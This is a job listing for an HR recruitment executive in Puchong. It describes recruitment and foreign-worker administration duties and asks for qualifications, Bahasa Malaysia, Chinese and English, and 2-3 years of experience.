– Be involved in the entire recruitment and selection process including preparing job advertisement write ups, short-listing of candidates, interviewing candidates and job offers
– Liaise with the head-hunter or recruitment agencies when needed
– Handle interview coordination and manage arrival of foreign workers.
– Handle administrative matters pertaining to local/ foreign workers management
– Liaise with the hiring managers on requirements of candidates and understand the job description
– Identify and implement sourcing strategies based upon the job position by creatively conducting research and/or utilizing a multitude of resources.
– Assist in any ad hoc tasks when required
– Candidate must possess at least a Higher Secondary/STPM/”A” Level/Pre-U, Diploma, Advanced/Higher/Graduate Diploma, Bachelor’s Degree, Post Graduate Diploma, Professional Degree, any field.
– Required language(s): Bahasa Malaysia, Chinese, English
– At least 2-3 year of working experience in the related field is required for this position.
– Preferably Senior Executives specializing in Human Resources or equivalent.
– Applicants must be willing to work in Puchong.
